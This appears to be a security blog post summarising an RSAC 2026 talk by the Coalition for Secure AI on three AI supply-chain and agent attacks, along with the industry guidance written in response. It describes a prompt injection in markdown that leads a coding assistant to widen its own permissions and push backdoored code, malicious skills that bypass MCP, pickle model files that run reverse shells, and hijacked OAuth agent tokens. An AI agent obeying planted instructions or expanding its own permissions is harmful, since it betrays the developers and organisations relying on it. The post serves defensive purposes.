
Who’s Minding the Agent? A New Framework for AI Identity and Access Control
April 17, 2026Authors: Akila Srinivasan and J.R. Rao.
Based on a session presented at RSAC 2026 Conference by Akila Srinivasan (Anthropic) and J.R. Rao (IBM) on behalf of the Coalition for Secure AI (CoSAI).
AI workloads are already in production across most enterprises, but security guidance has not caught up. That gap showed up throughout 2025 as a coding assistant that committed a backdoor, a model file that executed a reverse shell the moment it was loaded and an agent integration that handed more than 700 Salesforce environments to an attacker for ten days without tripping a single alert.
At RSAC 2026 Conference, we walked through each of those attacks, explained why the controls most organizations rely on did not catch them and showed what the Coalition for Secure AI (CoSAI) has published in response. This post covers the same ground for anyone who was not in the room.
The assumptions that stopped holding
Traditional software security rests on a handful of assumptions that no longer hold once AI enters the stack.
The first is that you can separate instructions from data. When natural language becomes an input channel, a markdown file is an injection vector. The second is that artifacts sit inert until you run them. Serialization formats like pickle execute code the moment you load the file, before any inference happens. The third is that privilege is something you grant deliberately. In practice, agents inherit whatever access the user who launched them had, which is often everything.
A newer pressure sits on top of those three. Personal agent stacks such as OpenClaw give every employee a local gateway with file, browser and terminal access plus long-term memory, running on the same laptop that holds their corporate credentials. Every person in your organization is now a consumer of AI on one side and an employee holding enterprise access on the other and that boundary is collapsing.
About CoSAI
The Coalition for Secure AI (CoSAI) is an OASIS Open Project that launched in July 2024 at the Aspen Security Forum. It now includes more than 45 partner organizations, among them Google, Microsoft, OpenAI, NVIDIA, Amazon, Anthropic and IBM. Cross-vendor agreement on AI security is rare, which is why the discussions carry weight.
Four workstreams organize the technical work: supply chain security for AI systems, preparing defenders for a changing threat landscape, AI risk governance and secure design patterns for agentic systems. Underneath all four sits the CoSAI Risk Map, a lifecycle-wide taxonomy that gives organizations a common language for identifying and mitigating AI-specific risks that traditional models miss.
Everything CoSAI produces lives on GitHub and technical participation is free. You do not need to be a sponsor to join a workstream, file an issue, or contribute to a SIG.
🧑💻 Case study one: your developer’s AI assistant just committed a backdoor
The dominant developer workflow in 2026 puts an AI coding tool outside the IDE with full codebase access. These tools read and write files, execute terminal commands in agentic modes and reach external systems through MCP, A2A, or skill files. Developers grant these permissions because the tools are dramatically more useful with full context and that is not wrong. But most security teams have zero visibility into what the tools actually read, write and execute. If you asked your SOC what your AI coding assistants did yesterday, most of you could not answer.
The Kilo Code vulnerability, CVE-2025-11445, showed exactly how this goes wrong. An attacker embeds malicious instructions in a README file, a GitHub issue, or a code comment. When the AI assistant ingests that content during normal repository analysis, the injected prompt tells it to modify its own configuration file and allow git commands that were previously blocked. The assistant then commits and pushes backdoored code without ever asking the user.
The attack vector is a markdown file. Natural language in a text document became a supply chain attack. In an agent ecosystem, markdown no longer describes behavior but drives it and a skill file that says “run this prerequisite” is functionally a shell script with a nicer font. Skills can bundle scripts and include curl commands and because MCP only gates tool calls, a skill that ships its own execution path can route around MCP entirely.
This was not a one-off. Researchers found 30 vulnerabilities across every major AI IDE they tested, 24 of which earned CVE identifiers, with confirmed exploits in Cursor, AWS Kiro and OpenAI Codex CLI. The attack chains are universal because the pattern is universal. The skill registry version of the same problem is already playing out at marketplace scale. OpenClaw’s registry grew from roughly 2,800 to more than 10,700 entries in a matter of months and researchers tracking the ClawHavoc campaign counted malicious skills climbing from 341 to over 820 as the marketplace grew, with one independent count approaching 1,200. A scan of about 4,000 skills found exposed credentials in many of them and outright malware in dozens.
Traditional security missed all of this because there is no code bug to find. The tool worked exactly as designed. The injection vector is a markdown file, which no SAST tool treats as executable and the critical move is self-modification: the AI was tricked into expanding its own permissions through natural language. Code review and signed commits still matter, but they have become backstops rather than the front line.
CoSAI’s response spans three workstreams. Workstream 4 (WS4) established the core principle that agent permission boundaries cannot be modified through natural language instructions, which directly closes the Kilo Code pattern and published sandboxing guidance for the highly autonomous modes these tools increasingly ship with. WS1’s supply chain paper identified indirect prompt injection in agentic systems as a distinct threat category, with a blunt mitigation: restrict model-accessible functions to read-only wherever possible and apply granular least privilege to every function the model can call. WS3 launched a SIG on AI-assisted code security whose first principle is that the same AI should not both write and review code. That sounds obvious, but most pipelines today do not enforce it.
We want to be honest about where this stands. The guidance is principled rather than prescriptive, the SIG is newly formed and every major AI IDE and coding agent shares this vulnerability class, which means individual vendor patches do not fix the structural issue. If your security model assumes MCP will gate tool calls, you can still lose to a malicious skill that routes around MCP through direct shell instructions. MCP can be part of a safe system, but it is not a safety guarantee by itself.
😈 Case study two: you downloaded a model and it downloaded malware
Most organizations consume open weights models the same way. The ML team goes to Hugging Face, picks a model based on download count and community feedback, integrates it into the pipeline and ships to production. Almost no one verifies what they are actually loading. Your CI/CD pipeline would refuse to run an unsigned binary, yet your ML pipeline probably loads unsigned models right now.
The attack surface is the file format itself. A PyTorch model file is a compressed pickle archive containing serialized Python objects and when you call torch.load it reconstructs those objects and executes any embedded callable functions during deserialization. The code runs the moment you load the file, with no inference required. Your security tools do not scan .pt or .bin files because they were never built to. It is the same blind spot we saw with skill files: an entire class of artifacts that carry executable intent while sitting outside every scanner’s definition of what counts as code.
The nullifAI attack in 2025 proved this works in the wild. Two malicious models on Hugging Face bypassed PickleScan by using deliberately corrupt pickle files, so the scanner threw errors instead of detecting the threat and reverse shells executed during deserialization. That was not the only bypass. Multiple CVEs throughout 2025 showed PickleScan failing to detect malicious callables, non-standard extensions and subclass imports, with one scoring CVSS 9.3. Namespace hijacking made the picture worse: attackers re-registered deleted account names and uploaded malicious models under the original identifiers and those models then appeared in Google Vertex AI and Azure catalogs. Any pipeline pulling by name instead of by hash was exposed. The software supply chain learned this lesson a decade ago and the ML ecosystem is only now catching up.
The exposure is no longer confined to your ML platform either. A skill running in a personal agent gateway can pull a model file from anywhere and load it locally. Same torch.load call, same pickle surface, none of your platform controls. The blast radius just moved from the ML pipeline to every laptop running an agent.
CoSAI’s WS1 published three things that address this directly. The Open Model Signing specification, released in September 2025, provides Sigstore-based signatures for model artifacts. It is the ML equivalent of code signing and it supports signing individual files or entire model directories through a single signed manifest. The WS1 supply chain paper names model serialization attacks as a specific threat category and recommends JSON, Protocol Buffers, ONNX and SavedModel as safe alternatives to pickle. The verification lifecycle guidance is equally explicit: verify attestations at every consumption phase, pin to hashes rather than names and have internal registries verify signatures between upload and consumer download.
The paper includes one honest caveat: signing addresses integrity, not safety, which means a malicious publisher can still sign a malicious model. You have to combine signing with provenance tracking and behavioral testing because no single control is sufficient.
The current state is uneven. Only NVIDIA NGC and IBM’s Granite models ship with OMS signatures today, while Hugging Face and PyTorch Hub do not require them. Nearly 45 percent of models still use pickle and migration will take years. What is still missing is an AI-specific SBOM standard that captures model provenance, training data lineage and fine-tuning history. The tooling exists, but adoption has not followed.
🪪 Case study three: trusted agent, compromised access
AI agents are now wired directly into enterprise tools. Sales chatbots query Salesforce, support agents manage tickets and marketing tools update the CMS. Each agent needs OAuth tokens with broad data access to be useful and each decides what to query and what actions to take with minimal human oversight.
You would not give a new contractor full admin access to every system on day one with no monitoring, no access review and no expiration date, yet that is what most AI agent deployments look like today. And the contractor is no longer just the agent your enterprise deployed. It is also the agent your employee installed at home last weekend and brought to work on Monday. Multiple security vendors issued the same guidance in early 2026: do not run personal agent gateways on a company device. That advice is correct, but it is not a control. You cannot build a security program on “please don’t.”
In August 2025, attackers compromised the Drift AI chatbot platform and stole the OAuth refresh tokens connecting Drift to customer Salesforce instances. Over ten days they queried more than 700 organizations’ Salesforce environments, exfiltrating Cases, Accounts, Users and Opportunities, then mining the exports for AWS keys, Snowflake tokens and plaintext passwords that customers had left in support tickets. Victims included Cloudflare, Palo Alto Networks, Proofpoint, Zscaler and Workday.
In this case, there was zero malware and phishing involved. Every action was a legitimate API call through a trusted connection and the attack was invisible because it looked exactly like Drift doing its job.
Three failure modes explain why nobody caught it. The trust model assumes the agent is the agent, but those API calls were indistinguishable from normal Drift behavior: same tokens, same endpoints, same query patterns. Traditional detection looks for anomalous access and this was not anomalous. Someone else was simply driving a trusted agent’s connection. Agent credentials have no lifecycle. OAuth refresh tokens had no expiration, no rotation and no scope limitation, so the attacker sat inside Salesloft for months before using them and there was no way to detect that the entity behind the token had changed. And nobody watches what agents do. Security teams monitor human users, not third-party agent API access and that problem is accelerating as autonomous agents call tools through MCP and skill files with even less oversight than OAuth integrations had.
CoSAI’s Technical Steering Committee published agentic principles in July 2025 requiring that agents be bounded and resilient, with purpose-specific entitlements rather than broad persistent access and permission boundaries enforced through technical controls rather than written policy. WS4’s work on agent identity and MCP security treats AI agents as non-human identities subject to access reviews, credential rotation and privilege certification, using short-lived tokens, proof of possession and least-privilege scoping for every agent-to-tool connection. The MCP security paper addresses tool poisoning and the confused deputy problem directly. WS1 names overly permissive entitlements as a threat, with a concrete mitigation of least privilege, just-in-time access and service account isolation. And the shared responsibility model, now transitioning from WS2 to WS3, clarifies who owns credential security, logging and incident notification between vendor and customer.
There is still no industry standard for treating AI agents as manageable non-human identities. The Drift breach ran ten days undetected because behavioral monitoring playbooks for agents are not standardized. The personal assistant wave makes this worse in a specific way: the enterprise at least chose to deploy Drift, but nobody chose to deploy the agent gateway running on your analyst’s laptop with cached SSO sessions in the browser. That is an unmanaged endpoint holding enterprise credentials, multiplied by every employee who wanted to be more productive this quarter.
No single workstream solves any single attack
The AI assistant backdoor is primarily a WS4 problem with WS1 and WS3 in supporting roles. The malicious model is almost entirely WS1, with WS3 contributing the SBOM standards work. The compromised agent access touches all four. These threats cross layers and the defense has to cross layers too.
The CoSAI Risk Map is the shared language that makes that coordination possible. It is a taxonomy spanning four layers of the AI lifecycle: data, infrastructure, model and application. Each layer has specific assets, risks attached to those assets and controls mitigate those risks. Different teams own different layers, but the attacks we described cross between them, which is why you need a map. It is on GitHub and can be pulled into your own risk assessment process today.
🫵 What you can do and when
This week. Pull the audit log on your AI coding tools. Verify that model artifacts are pinned to hashes, not names. Inventory every OAuth token your AI tools hold into enterprise SaaS. And add one more item to that inventory: find out which employees are running personal agent gateways on corporate devices and what those gateways have permission to touch.
This quarter. Segment repository access by sensitivity and route AI-generated code through the same SAST and review pipeline you use for third-party code. Gate your ML pipeline on signature verification and extend SBOMs to cover model dependencies. Treat agents as non-human identities with access reviews and credential rotation. And decide what your policy is for agent skill installation and MCP server connections on corporate endpoints, because the default answer right now is that there isn’t one.
This year. Adopt sandboxing and isolation for AI coding agents. Move toward hermetic ML builds at SLSA L3. Push the industry toward an agent identity standard with multi-party authentication, delegation chains and behavioral attestation.
There are also two sets of questions worth taking back to your vendors.
Ask your AI tool vendors to publish telemetry showing what the tool read, wrote and ingested and what permissions it exercised. A black box with write access to your codebase is not acceptable. Ask them to ship immutable agent configurations that cannot be modified through natural language. And if they operate a skill registry or tool marketplace, remind them that they are operating an app store and should act like one: scan submissions for one-liner installers and encoded payloads, add publisher provenance and reputation and stop treating community reporting as moderation.
Ask your security tool vendors whether their SIEM and XDR can baseline agent behavior rather than just human behavior, whether their SAST and DAST can handle ten times the code volume and test AI-facing endpoints, MCP servers and agent tool APIs and whether their endpoint tooling recognizes that a skill file carries executable intent. If the answer is no, that is a roadmap conversation for your next vendor review.
Where the work is happening next
Two special interest groups are forming now and are open to contributors.
The first, which sits under WS3, tackles the problem that AI tools generate code an order of magnitude faster than human review and security tooling can handle. It has three deliverable tracks: an enterprise control framework that scales review scrutiny with code sensitivity, a tooling reference architecture that integrates SAST, DAST and IAST into existing DevSecOps pipelines as fail-the-build gates and an AI-assisted hardening methodology where review agents apply CodeGuard rules at machine speed while humans stay on the loop for complex logic.
The second SIG, which sits under WS4, starts from the premise that agents operate at speeds where traditional authorization and monitoring loops simply do not work, making the risk profile comparable to an automated insider threat. Its three tracks cover an agent lifecycle control framework with context-aware identity and operational guardrails such as circuit breakers and kill switches, a runtime architecture built around tool gateways as mandatory choke points for policy enforcement and agentic hardening through guardian agents and automated incident response that revokes tokens on policy violation. The tool gateway pattern matters because it is the only architectural answer to the open-skill problem. If every capability an agent invokes has to pass through a gateway you control, a malicious skill cannot route around MCP with a bundled curl command. You close the bypass, not just the front door.
Getting involved
One URL: coalitionforsecureai.org. Everything branches from there. You can join the mailing lists, connect on Slack, or submit ideas, code and documentation through GitHub. Technical participation is free and you do not need corporate sponsorship to join a workstream call or file an issue. The four workstreams and both SIGs are open.




